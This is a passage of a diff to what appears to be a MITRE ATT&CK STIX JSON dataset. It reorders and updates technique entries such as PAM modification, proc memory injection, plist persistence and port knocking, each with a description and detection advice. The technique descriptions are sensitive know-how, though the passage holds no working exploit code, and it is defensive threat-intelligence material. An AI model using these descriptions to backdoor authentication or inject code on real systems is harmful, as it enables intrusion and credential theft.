+ "modified": "2020-03-26T17:48:28.002Z",
+ "kill_chain_phases": [
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "discovery"
+ }
],
+ "type": "attack-pattern",
+ "id": "attack-pattern--15dbf668-795c-41e6-8219-f0447c0e64ce",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "name": "Permission Groups Discovery",
+ "description": "Adversaries may attempt to find group and permission settings. This information can help adversaries determine which user accounts and groups are available, the membership of users in particular groups, and which users and groups have elevated permissions.",
"external_references": [
{
"source_name": "mitre-attack",
@@ -19221,19 +19894,9 @@
"url": "https://capec.mitre.org/data/definitions/576.html"
}
],
- "description": "Adversaries may attempt to find group and permission settings. This information can help adversaries determine which user accounts and groups are available, the membership of users in particular groups, and which users and groups have elevated permissions.",
- "name": "Permission Groups Discovery",
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "id": "attack-pattern--15dbf668-795c-41e6-8219-f0447c0e64ce",
- "type": "attack-pattern",
- "kill_chain_phases": [
- {
- "kill_chain_name": "mitre-attack",
- "phase_name": "discovery"
- }
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
- "modified": "2020-03-26T17:48:28.002Z",
- "created": "2017-05-31T21:30:55.471Z",
"x_mitre_is_subtechnique": false,
"x_mitre_contributors": [
"Microsoft Threat Intelligence Center (MSTIC)"
@@ -19291,16 +19954,6 @@
],
"modified": "2020-03-28T00:04:46.427Z",
"created": "2020-03-02T18:45:07.892Z",
- "x_mitre_platforms": [
- "Linux",
- "macOS",
- "Windows",
- "SaaS",
- "Office 365"
- ],
- "x_mitre_detection": "Network intrusion detection systems and email gateways can be used to detect phishing with malicious attachments in transit. Detonation chambers may also be used to identify malicious attachments. Solutions can be signature and behavior based, but adversaries may construct attachments in a way to avoid these systems.\n\nURL inspection within email (including expanding shortened links) can help detect links leading to known malicious sites. Detonation chambers can be used to detect these links and either automatically go to these sites to determine if they're potentially malicious, or wait and capture the content if a user visits the link.\n\nBecause most common third-party services used for phishing via service leverage TLS encryption, SSL/TLS inspection is generally required to detect the initial communication/delivery. With SSL/TLS inspection intrusion detection signatures or other security gateway appliances may be able to detect malware.\n\nAnti-virus can potentially detect malicious documents and files that are downloaded on the user's computer. Many possible detections of follow-on behavior may take place once [User Execution](https://attack.mitre.org/techniques/T1204) occurs.",
- "x_mitre_is_subtechnique": false,
- "x_mitre_version": "1.0",
"x_mitre_data_sources": [
"File monitoring",
"Packet capture",
@@ -19311,6 +19964,16 @@
"Detonation chamber",
"SSL/TLS inspection",
"Anti-virus"
+ ],
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": false,
+ "x_mitre_detection": "Network intrusion detection systems and email gateways can be used to detect phishing with malicious attachments in transit. Detonation chambers may also be used to identify malicious attachments. Solutions can be signature and behavior based, but adversaries may construct attachments in a way to avoid these systems.\n\nURL inspection within email (including expanding shortened links) can help detect links leading to known malicious sites. Detonation chambers can be used to detect these links and either automatically go to these sites to determine if they're potentially malicious, or wait and capture the content if a user visits the link.\n\nBecause most common third-party services used for phishing via service leverage TLS encryption, SSL/TLS inspection is generally required to detect the initial communication/delivery. With SSL/TLS inspection intrusion detection signatures or other security gateway appliances may be able to detect malware.\n\nAnti-virus can potentially detect malicious documents and files that are downloaded on the user's computer. Many possible detections of follow-on behavior may take place once [User Execution](https://attack.mitre.org/techniques/T1204) occurs.",
+ "x_mitre_platforms": [
+ "Linux",
+ "macOS",
+ "Windows",
+ "SaaS",
+ "Office 365"
]
},
{
@@ -19334,6 +19997,19 @@
"created": "2017-12-14T16:46:06.044Z"
},
{
+ "created": "2020-01-24T20:02:59.149Z",
+ "modified": "2020-06-20T19:57:36.136Z",
+ "kill_chain_phases": [
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "persistence"
+ },
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "privilege-escalation"
+ }
+ ],
+ "type": "attack-pattern",
"id": "attack-pattern--6747daa2-3533-4e78-8fb8-446ebb86448a",
"description": "Adversaries may modify plist files to run a program during system boot or user login. Property list (plist) files contain all of the information that macOS and OS X uses to configure applications and services. These files are UTF-8 encoded and formatted like XML documents via a series of keys surrounded by < >. They detail when programs should execute, file paths to the executables, program arguments, required OS permissions, and many others. plists are located in certain locations depending on their purpose such as /Library/Preferences (which execute with elevated privileges) and ~/Library/Preferences (which execute with a user's privileges). \n\nAdversaries can modify plist files to execute their code as part of establishing persistence. plists may also be used to elevate privileges since they may execute in the context of another user.(Citation: Sofacy Komplex Trojan) \n\nA specific plist used for execution at login is com.apple.loginitems.plist.(Citation: Methods of Mac Malware Persistence) Applications under this plist run under the logged in user's context, and will be started every time the user logs in. Login items installed using the Service Management Framework are not visible in the System Preferences and can only be removed by the application that created them.(Citation: Adding Login Items) Users have direct control over login items installed using a shared file list which are also visible in System Preferences (Citation: Adding Login Items). Some of these applications can open visible dialogs to the user, but they don\u2019t all have to since there is an option to \"hide\" the window. If an adversary can register their own login item or modified an existing one, then they can use it to execute their code for a persistence mechanism each time the user logs in (Citation: Malware Persistence on OS X) (Citation: OSX.Dok Malware). The API method SMLoginItemSetEnabled can be used to set Login Items, but scripting languages like [AppleScript](https://attack.mitre.org/techniques/T1059/002) can do this as well. (Citation: Adding Login Items)",
"name": "Plist Modification",
@@ -19373,32 +20049,91 @@
"source_name": "OSX.Dok Malware"
}
],
- "type": "attack-pattern",
- "kill_chain_phases": [
- {
- "kill_chain_name": "mitre-attack",
- "phase_name": "persistence"
- },
- {
- "kill_chain_name": "mitre-attack",
- "phase_name": "privilege-escalation"
- }
+ "x_mitre_platforms": [
+ "macOS"
],
- "modified": "2020-03-25T19:47:38.978Z",
- "created": "2020-01-24T20:02:59.149Z",
- "x_mitre_version": "1.0",
- "x_mitre_is_subtechnique": true,
- "x_mitre_permissions_required": [
- "User",
- "Administrator"
- ],
- "x_mitre_detection": "File system monitoring can determine if plist files are being modified. Users should not have permission to modify these in most cases. Some software tools like \"Knock Knock\" can detect persistence mechanisms and point to the specific files that are being referenced. This can be helpful to see what is actually being executed.\n\nAll the login items created via shared file lists are viewable by going to the Apple menu -> System Preferences -> Users & Groups -> Login items. This area (and the corresponding file locations) should be monitored and whitelisted for known good applications. Otherwise, Login Items are located in Contents/Library/LoginItems within an application bundle, so these paths should be monitored as well.(Citation: Adding Login Items)\n\nMonitor process execution for abnormal process execution resulting from modified plist files. Monitor utilities used to modify plist files or that take a plist file as an argument, which may indicate suspicious activity.",
"x_mitre_data_sources": [
"File monitoring",
"Process monitoring",
"Process command-line parameters"
],
+ "x_mitre_detection": "File system monitoring can determine if plist files are being modified. Users should not have permission to modify these in most cases. Some software tools like \"Knock Knock\" can detect persistence mechanisms and point to the specific files that are being referenced. This can be helpful to see what is actually being executed.\n\nAll the login items created via shared file lists are viewable by going to the Apple menu -> System Preferences -> Users & Groups -> Login items. This area (and the corresponding file locations) should be monitored and allowed for known good applications. Otherwise, Login Items are located in Contents/Library/LoginItems within an application bundle, so these paths should be monitored as well.(Citation: Adding Login Items)\n\nMonitor process execution for abnormal process execution resulting from modified plist files. Monitor utilities used to modify plist files or that take a plist file as an argument, which may indicate suspicious activity.",
+ "x_mitre_permissions_required": [
+ "User",
+ "Administrator"
+ ],
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_version": "1.0"
+ },
+ {
+ "external_references": [
+ {
+ "source_name": "mitre-attack",
+ "external_id": "T1556.003",
+ "url": "https://attack.mitre.org/techniques/T1556/003"
+ },
+ {
+ "source_name": "Apple PAM",
+ "url": "https://opensource.apple.com/source/dovecot/dovecot-239/dovecot/doc/wiki/PasswordDatabase.PAM.txt",
+ "description": "Apple. (2011, May 11). PAM - Pluggable Authentication Modules. Retrieved June 25, 2020."
+ },
+ {
+ "source_name": "Man Pam_Unix",
+ "url": "https://linux.die.net/man/8/pam_unix",
+ "description": "die.net. (n.d.). pam_unix(8) - Linux man page. Retrieved June 25, 2020."
+ },
+ {
+ "source_name": "Red Hat PAM",
+ "url": "https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/managing_smart_cards/pluggable_authentication_modules",
+ "description": "Red Hat. (n.d.). CHAPTER 2. USING PLUGGABLE AUTHENTICATION MODULES (PAM). Retrieved June 25, 2020."
+ },
+ {
+ "source_name": "PAM Backdoor",
+ "url": "https://github.com/zephrax/linux-pam-backdoor",
+ "description": "zephrax. (2018, August 3). linux-pam-backdoor. Retrieved June 25, 2020."
+ },
+ {
+ "source_name": "PAM Creds",
+ "url": "https://x-c3ll.github.io/posts/PAM-backdoor-DNS/",
+ "description": "Fern\u00e1ndez, J. M. (2018, June 27). Exfiltrating credentials via PAM backdoors & DNS requests. Retrieved June 26, 2020."
+ }
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "name": "Pluggable Authentication Modules",
+ "description": "Adversaries may modify pluggable authentication modules (PAM) to access user credentials or enable otherwise unwarranted access to accounts. PAM is a modular system of configuration files, libraries, and executable files which guide authentication for many services. The most common authentication module is pam_unix.so, which retrieves, sets, and verifies account authentication information in /etc/passwd and /etc/shadow.(Citation: Apple PAM)(Citation: Man Pam_Unix)(Citation: Red Hat PAM)\n\nAdversaries may modify components of the PAM system to create backdoors. PAM components, such as pam_unix.so, can be patched to accept arbitrary adversary supplied values as legitimate credentials.(Citation: PAM Backdoor)\n\nMalicious modifications to the PAM system may also be abused to steal credentials. Adversaries may infect PAM resources with code to harvest user credentials, since the values exchanged with PAM components may be plain-text since PAM does not store passwords.(Citation: PAM Creds)(Citation: Apple PAM)",
+ "id": "attack-pattern--06c00069-771a-4d57-8ef5-d3718c1a8771",
+ "type": "attack-pattern",
+ "kill_chain_phases": [
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "credential-access"
+ },
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "defense-evasion"
+ }
+ ],
+ "modified": "2020-07-13T21:23:01.370Z",
+ "created": "2020-06-26T04:01:09.648Z",
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_permissions_required": [
+ "root"
+ ],
+ "x_mitre_detection": "Monitor PAM configuration and module paths (ex: /etc/pam.d/) for changes. Use system-integrity tools such as AIDE and monitoring tools such as auditd to monitor PAM files.\n\nLook for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times (ex: when the user is not present) or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).",
+ "x_mitre_data_sources": [
+ "Authentication logs",
+ "File monitoring"
+ ],
+ "x_mitre_contributors": [
+ "Scott Knight, @sdotknight, VMware Carbon Black",
+ "George Allen, VMware Carbon Black"
+ ],
"x_mitre_platforms": [
+ "Linux",
"macOS"
]
},
@@ -19406,28 +20141,8 @@
"external_references": [
{
"source_name": "mitre-attack",
- "external_id": "T1205",
- "url": "https://attack.mitre.org/techniques/T1205"
- },
- {
- "url": "https://www.giac.org/paper/gcih/342/handle-cd00r-invisible-backdoor/103631",
- "description": "Hartrell, Greg. (2002, August). Get a handle on cd00r: The invisible backdoor. Retrieved October 13, 2018.",
- "source_name": "Hartrell cd00r 2002"
- }
- ],
- "name": "Port Knocking",
- "id": "attack-pattern--451a9977-d255-43c9-b431-66de80130c8c",
- "revoked": true,
- "type": "attack-pattern",
- "modified": "2020-01-22T20:28:29.694Z",
- "created": "2018-04-18T17:59:24.739Z"
- },
- {
- "external_references": [
- {
- "source_name": "mitre-attack",
- "external_id": "T1545.001",
- "url": "https://attack.mitre.org/techniques/T1545/001"
+ "external_id": "T1205.001",
+ "url": "https://attack.mitre.org/techniques/T1205/001"
},
{
"url": "https://www.giac.org/paper/gcih/342/handle-cd00r-invisible-backdoor/103631",
@@ -19441,7 +20156,7 @@
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"name": "Port Knocking",
"description": "Adversaries may use port knocking to hide open ports used for persistence or command and control. To enable a port, an adversary sends a series of attempted connections to a predefined sequence of closed ports. After the sequence is completed, opening a port is often accomplished by the host based firewall, but could also be implemented by custom software.\n\nThis technique has been observed to both for the dynamic opening of a listening port as well as the initiating of a connection to a listening server on a different system.\n\nThe observation of the signal packets to trigger the communication can be conducted through different methods. One means, originally implemented by Cd00r (Citation: Hartrell cd00r 2002), is to use the libpcap libraries to sniff for the packets in question. Another method leverages raw sockets, which enables the malware to use ports that are already open for use by other programs.",
- "id": "attack-pattern--90410d1b-b01b-4fe9-9cea-c0a3427a419c",
+ "id": "attack-pattern--8868cb5b-d575-4a60-acb2-07d37389a2fd",
"type": "attack-pattern",
"kill_chain_phases": [
{
@@ -19457,25 +20172,23 @@
"phase_name": "command-and-control"
}
],
- "modified": "2020-01-22T20:26:58.120Z",
- "created": "2020-01-22T20:26:58.120Z",
- "x_mitre_platforms": [
- "Linux",
- "macOS"
+ "modified": "2020-07-01T18:23:25.002Z",
+ "created": "2020-07-01T18:23:25.002Z",
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_permissions_required": [
+ "User"
],
+ "x_mitre_detection": "Record network packets sent to and from the system, looking for extraneous packets that do not belong to established flows.",
"x_mitre_data_sources": [
"Netflow/Enclave netflow",
"Packet capture"
],
- "x_mitre_detection": "Record network packets sent to and from the system, looking for extraneous packets that do not belong to established flows.",
- "x_mitre_defense_bypassed": [
- "Defensive network service scanning"
- ],
- "x_mitre_permissions_required": [
- "User"
- ],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ "x_mitre_platforms": [
+ "Linux",
+ "macOS",
+ "Windows"
+ ]
},
{
"external_references": [
@@ -19550,13 +20263,16 @@
],
"modified": "2020-01-24T19:46:27.750Z",
"created": "2020-01-24T19:46:27.750Z",
- "x_mitre_platforms": [
- "Windows"
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_effective_permissions": [
+ "SYSTEM"
],
- "x_mitre_contributors": [
- "Stefan Kanthak",
- "Travis Smith, Tripwire"
+ "x_mitre_permissions_required": [
+ "SYSTEM",
+ "Administrator"
],
+ "x_mitre_detection": "Monitor process API calls to AddMonitor.(Citation: AddMonitor) Monitor DLLs that are loaded by spoolsv.exe for DLLs that are abnormal. New DLLs written to the System32 directory that do not correlate with known good software or patching may be suspicious. \n\nMonitor Registry writes to HKLM\\SYSTEM\\CurrentControlSet\\Control\\Print\\Monitors. Run the Autoruns utility, which checks for this Registry key as a persistence mechanism (Citation: TechNet Autoruns)",
"x_mitre_data_sources": [
"File monitoring",
"API monitoring",
@@ -19564,16 +20280,13 @@
"Windows Registry",
"Process monitoring"
],
- "x_mitre_detection": "Monitor process API calls to AddMonitor.(Citation: AddMonitor) Monitor DLLs that are loaded by spoolsv.exe for DLLs that are abnormal. New DLLs written to the System32 directory that do not correlate with known good software or patching may be suspicious. \n\nMonitor Registry writes to HKLM\\SYSTEM\\CurrentControlSet\\Control\\Print\\Monitors. Run the Autoruns utility, which checks for this Registry key as a persistence mechanism (Citation: TechNet Autoruns)",
- "x_mitre_permissions_required": [
- "SYSTEM",
- "Administrator"
+ "x_mitre_contributors": [
+ "Stefan Kanthak",
+ "Travis Smith, Tripwire"
],
- "x_mitre_effective_permissions": [
- "SYSTEM"
- ],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ "x_mitre_platforms": [
+ "Windows"
+ ]
},
{
"external_references": [
@@ -19606,24 +20319,24 @@
"phase_name": "privilege-escalation"
}
],
- "modified": "2020-02-21T22:34:26.937Z",
+ "modified": "2020-06-20T22:19:58.813Z",
"created": "2020-01-14T01:27:31.344Z",
- "x_mitre_platforms": [
- "Windows"
- ],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0",
- "x_mitre_detection": "Monitoring Windows API calls indicative of the various types of code injection may generate a significant amount of data and may not be directly useful for defense unless collected under specific circumstances for known bad sequences of calls, since benign use of API functions may be common and difficult to distinguish from malicious behavior. Windows API calls such as CreateRemoteThread and those that can be used to modify memory within another process, such as VirtualAllocEx/WriteProcessMemory, may be used for this technique.(Citation: Endgame Process Injection July 2017)\n\nAnalyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. ",
- "x_mitre_permissions_required": [
- "User"
+ "x_mitre_defense_bypassed": [
+ "Anti-virus",
+ "Application control"
],
"x_mitre_data_sources": [
"Process monitoring",
"API monitoring"
],
- "x_mitre_defense_bypassed": [
- "Anti-virus",
- "Process whitelisting"
+ "x_mitre_permissions_required": [
+ "User"
+ ],
+ "x_mitre_detection": "Monitoring Windows API calls indicative of the various types of code injection may generate a significant amount of data and may not be directly useful for defense unless collected under specific circumstances for known bad sequences of calls, since benign use of API functions may be common and difficult to distinguish from malicious behavior. Windows API calls such as CreateRemoteThread and those that can be used to modify memory within another process, such as VirtualAllocEx/WriteProcessMemory, may be used for this technique.(Citation: Endgame Process Injection July 2017)\n\nAnalyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. ",
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_platforms": [
+ "Windows"
]
},
{
@@ -19738,16 +20451,18 @@
"phase_name": "execution"
}
],
- "modified": "2020-03-28T16:26:30.920Z",
+ "modified": "2020-06-24T13:51:22.360Z",
"created": "2020-03-09T13:48:55.078Z",
- "x_mitre_platforms": [
- "Windows"
- ],
- "x_mitre_contributors": [
- "Praetorian"
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_permissions_required": [
+ "User",
+ "Administrator"
],
+ "x_mitre_remote_support": true,
+ "x_mitre_detection": "If proper execution policy is set, adversaries will likely be able to define their own execution policy if they obtain administrator or system access, either through the Registry or at the command line. This change in policy on a system may be a way to detect malicious use of PowerShell. If PowerShell is not used in an environment, then simply looking for PowerShell execution may detect malicious activity.\n\nMonitor for loading and/or execution of artifacts associated with PowerShell specific assemblies, such as System.Management.Automation.dll (especially to unusual process names/locations).(Citation: Sixdub PowerPick Jan 2016)(Citation: SilentBreak Offensive PS Dec 2015)\n\nIt is also beneficial to turn on PowerShell logging to gain increased fidelity in what occurs during execution (which is applied to .NET invocations). (Citation: Malware Archaeology PowerShell Cheat Sheet) PowerShell 5.0 introduced enhanced logging capabilities, and some of those features have since been added to PowerShell 4.0. Earlier versions of PowerShell do not have many logging features.(Citation: FireEye PowerShell Logging 2016) An organization can gather PowerShell execution details in a data analytic platform to supplement it with other data.",
"x_mitre_data_sources": [
- "Windows Registry",
+ "Windows event logs",
"Process monitoring",
"Process command-line parameters",
"PowerShell logs",
@@ -19755,14 +20470,12 @@
"File monitoring",
"DLL monitoring"
],
- "x_mitre_detection": "If proper execution policy is set, adversaries will likely be able to define their own execution policy if they obtain administrator or system access, either through the Registry or at the command line. This change in policy on a system may be a way to detect malicious use of PowerShell. If PowerShell is not used in an environment, then simply looking for PowerShell execution may detect malicious activity.\n\nMonitor for loading and/or execution of artifacts associated with PowerShell specific assemblies, such as System.Management.Automation.dll (especially to unusual process names/locations).(Citation: Sixdub PowerPick Jan 2016)(Citation: SilentBreak Offensive PS Dec 2015)\n\nIt is also beneficial to turn on PowerShell logging to gain increased fidelity in what occurs during execution (which is applied to .NET invocations). (Citation: Malware Archaeology PowerShell Cheat Sheet) PowerShell 5.0 introduced enhanced logging capabilities, and some of those features have since been added to PowerShell 4.0. Earlier versions of PowerShell do not have many logging features.(Citation: FireEye PowerShell Logging 2016) An organization can gather PowerShell execution details in a data analytic platform to supplement it with other data.",
- "x_mitre_remote_support": true,
- "x_mitre_permissions_required": [
- "User",
- "Administrator"
+ "x_mitre_contributors": [
+ "Praetorian"
],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ "x_mitre_platforms": [
+ "Windows"
+ ]
},
{
"external_references": [
@@ -19847,25 +20560,25 @@
],
"modified": "2020-03-24T21:31:31.082Z",
"created": "2020-01-24T15:11:02.758Z",
- "x_mitre_platforms": [
- "Windows"
- ],
- "x_mitre_contributors": [
- "Allen DeRyke, ICE"
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_permissions_required": [
+ "User",
+ "Administrator"
],
+ "x_mitre_detection": "Locations where profile.ps1 can be stored should be monitored for new profiles or modifications. (Citation: Malware Archaeology PowerShell Cheat Sheet) Example profile locations include:\n\n* $PsHome\\Profile.ps1\n* $PsHome\\Microsoft.{HostProgram}_profile.ps1\n* $Home\\My Documents\\PowerShell\\Profile.ps1\n* $Home\\My Documents\\PowerShell\\Microsoft.{HostProgram}_profile.ps1\n\nMonitor abnormal PowerShell commands, unusual loading of PowerShell drives or modules, and/or execution of unknown programs.",
"x_mitre_data_sources": [
"PowerShell logs",
"File monitoring",
"Process command-line parameters",
"Process monitoring"
],
- "x_mitre_detection": "Locations where profile.ps1 can be stored should be monitored for new profiles or modifications. (Citation: Malware Archaeology PowerShell Cheat Sheet) Example profile locations include:\n\n* $PsHome\\Profile.ps1\n* $PsHome\\Microsoft.{HostProgram}_profile.ps1\n* $Home\\My Documents\\PowerShell\\Profile.ps1\n* $Home\\My Documents\\PowerShell\\Microsoft.{HostProgram}_profile.ps1\n\nMonitor abnormal PowerShell commands, unusual loading of PowerShell drives or modules, and/or execution of unknown programs.",
- "x_mitre_permissions_required": [
- "User",
- "Administrator"
+ "x_mitre_contributors": [
+ "Allen DeRyke, ICE"
],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ "x_mitre_platforms": [
+ "Windows"
+ ]
},
{
"id": "attack-pattern--7f0ca133-88c4-40c6-a62f-b3083a7fbc2e",
@@ -19903,19 +20616,11 @@
"phase_name": "persistence"
}
],
- "modified": "2020-03-23T23:50:48.319Z",
+ "modified": "2020-05-19T21:22:38.174Z",
"created": "2019-11-13T14:44:49.439Z",
- "x_mitre_is_subtechnique": false,
- "x_mitre_detection": "Perform integrity checking on pre-OS boot mechanisms that can be manipulated for malicious purposes. Take snapshots of boot records and firmware and compare against known good images. Log changes to boot records, BIOS, and EFI, which can be performed by API calls, and compare against known good behavior and patching.\n\nDisk check, forensic utilities, and data from device drivers (i.e. processes and API calls) may reveal anomalies that warrant deeper investigation. (Citation: ITWorld Hard Disk Health Dec 2014)",
- "x_mitre_version": "1.0",
- "x_mitre_defense_bypassed": [
- "Anti-virus",
- "Host intrusion prevention systems",
- "File monitoring"
- ],
- "x_mitre_permissions_required": [
- "Administrator",
- "SYSTEM"
+ "x_mitre_platforms": [
+ "Linux",
+ "Windows"
],
"x_mitre_data_sources": [
"VBR",
@@ -19927,10 +20632,18 @@
"BIOS",
"API monitoring"
],
- "x_mitre_platforms": [
- "Linux",
- "Windows"
- ]
+ "x_mitre_permissions_required": [
+ "Administrator",
+ "SYSTEM"
+ ],
+ "x_mitre_defense_bypassed": [
+ "Anti-virus",
+ "Host intrusion prevention systems",
+ "File monitoring"
+ ],
+ "x_mitre_version": "1.0",
+ "x_mitre_detection": "Perform integrity checking on pre-OS boot mechanisms that can be manipulated for malicious purposes. Take snapshots of boot records and firmware and compare against known good images. Log changes to boot records, BIOS, and EFI, which can be performed by API calls, and compare against known good behavior and patching.\n\nDisk check, forensic utilities, and data from device drivers (i.e. processes and API calls) may reveal anomalies that warrant deeper investigation. (Citation: ITWorld Hard Disk Health Dec 2014)",
+ "x_mitre_is_subtechnique": false
},
{
"id": "attack-pattern--56ff457d-5e39-492b-974c-dfd2b8603ffe",
@@ -20001,23 +20714,23 @@
],
"modified": "2020-03-29T21:36:36.613Z",
"created": "2020-02-04T13:06:49.258Z",
- "x_mitre_version": "1.0",
- "x_mitre_is_subtechnique": true,
- "x_mitre_permissions_required": [
- "User"
- ],
- "x_mitre_detection": "Monitor access to files and directories related to cryptographic keys and certificates as a means for potentially detecting access patterns that may indicate collection and exfiltration activity. Collect authentication logs and look for potentially abnormal activity that may indicate improper use of keys or certificates for remote authentication.",
- "x_mitre_data_sources": [
- "File monitoring"
- ],
- "x_mitre_contributors": [
- "Itzik Kotler, SafeBreach"
- ],
"x_mitre_platforms": [
"Linux",
"macOS",
"Windows"
- ]
+ ],
+ "x_mitre_contributors": [
+ "Itzik Kotler, SafeBreach"
+ ],
+ "x_mitre_data_sources": [
+ "File monitoring"
+ ],
+ "x_mitre_detection": "Monitor access to files and directories related to cryptographic keys and certificates as a means for potentially detecting access patterns that may indicate collection and exfiltration activity. Collect authentication logs and look for potentially abnormal activity that may indicate improper use of keys or certificates for remote authentication.",
+ "x_mitre_permissions_required": [
+ "User"
+ ],
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_version": "1.0"
},
{
"external_references": [
@@ -20048,27 +20761,20 @@
],
"modified": "2020-03-19T15:32:18.098Z",
"created": "2020-02-11T18:46:24.434Z",
- "x_mitre_platforms": [
- "Linux"
+ "x_mitre_data_sources": [
+ "Process monitoring"
],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0",
- "x_mitre_detection": "To obtain the passwords and hashes stored in memory, processes must open a maps file in the /proc filesystem for the process being analyzed. This file is stored under the path /proc/\\*/maps, where the \\* directory is the unique pid of the program being interrogated for such authentication data. The AuditD monitoring tool, which ships stock in many Linux distributions, can be used to watch for hostile processes opening this file in the proc file system, alerting on the pid, process name, and arguments of such programs.",
"x_mitre_permissions_required": [
"root"
],
- "x_mitre_data_sources": [
- "Process monitoring"
+ "x_mitre_detection": "To obtain the passwords and hashes stored in memory, processes must open a maps file in the /proc filesystem for the process being analyzed. This file is stored under the path /proc/\\*/maps, where the \\* directory is the unique pid of the program being interrogated for such authentication data. The AuditD monitoring tool, which ships stock in many Linux distributions, can be used to watch for hostile processes opening this file in the proc file system, alerting on the pid, process name, and arguments of such programs.",
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_platforms": [
+ "Linux"
]
},
{
- "id": "attack-pattern--d201d4cc-214d-4a74-a1ba-b3fa09fd4591",
- "description": "Adversaries may inject malicious code into processes via the /proc filesystem in order to evade process-based defenses as well as possibly elevate privileges. Proc memory injection is a method of executing arbitrary code in the address space of a separate live process. \n\nProc memory injection involves enumerating the memory of a process via the /proc filesystem (/proc/[pid]) then crafting a return-oriented programming (ROP) payload with available gadgets/instructions. Each running process has its own directory, which includes memory mappings. Proc memory injection is commonly performed by overwriting the target processes\u2019 stack using memory mappings provided by the /proc filesystem. This information can be used to enumerate offsets (including the stack) and gadgets (or instructions within the program that can be used to build a malicious payload) otherwise hidden by process memory protections such as address space layout randomization (ASLR). Once enumerated, the target processes\u2019 memory map within /proc/[pid]/maps can be overwritten using dd.(Citation: Uninformed Needle)(Citation: GDS Linux Injection)(Citation: DD Man) \n\nOther techniques such as [LD_PRELOAD](https://attack.mitre.org/techniques/T1574/006) may be used to populate a target process with more available gadgets. Similar to [Process Hollowing](https://attack.mitre.org/techniques/T1055/012), proc memory injection may target child processes (such as a backgrounded copy of sleep).(Citation: GDS Linux Injection) \n\nRunning code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via proc memory injection may also evade detection from security products since the execution is masked under a legitimate process. ",
- "name": "Proc Memory",
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
"external_references": [
{
"source_name": "mitre-attack",
@@ -20091,6 +20797,13 @@
"description": "Kerrisk, M. (2020, February 2). DD(1) User Commands. Retrieved February 21, 2020."
}
],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "name": "Proc Memory",
+ "description": "Adversaries may inject malicious code into processes via the /proc filesystem in order to evade process-based defenses as well as possibly elevate privileges. Proc memory injection is a method of executing arbitrary code in the address space of a separate live process. \n\nProc memory injection involves enumerating the memory of a process via the /proc filesystem (/proc/[pid]) then crafting a return-oriented programming (ROP) payload with available gadgets/instructions. Each running process has its own directory, which includes memory mappings. Proc memory injection is commonly performed by overwriting the target processes\u2019 stack using memory mappings provided by the /proc filesystem. This information can be used to enumerate offsets (including the stack) and gadgets (or instructions within the program that can be used to build a malicious payload) otherwise hidden by process memory protections such as address space layout randomization (ASLR). Once enumerated, the target processes\u2019 memory map within /proc/[pid]/maps can be overwritten using dd.(Citation: Uninformed Needle)(Citation: GDS Linux Injection)(Citation: DD Man) \n\nOther techniques such as [LD_PRELOAD](https://attack.mitre.org/techniques/T1574/006) may be used to populate a target process with more available gadgets. Similar to [Process Hollowing](https://attack.mitre.org/techniques/T1055/012), proc memory injection may target child processes (such as a backgrounded copy of sleep).(Citation: GDS Linux Injection) \n\nRunning code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via proc memory injection may also evade detection from security products since the execution is masked under a legitimate process. ",
+ "id": "attack-pattern--d201d4cc-214d-4a74-a1ba-b3fa09fd4591",
"type": "attack-pattern",
"kill_chain_phases": [
{
@@ -20102,10 +20815,10 @@
"phase_name": "privilege-escalation"
}
],
- "modified": "2020-03-26T20:33:52.548Z",
+ "modified": "2020-06-20T22:25:55.331Z",
"created": "2020-01-14T01:34:10.588Z",
"x_mitre_defense_bypassed": [
- "Process whitelisting",
